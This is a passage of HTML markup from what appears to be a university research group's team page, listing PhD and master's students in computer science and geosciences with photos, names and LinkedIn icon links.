11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 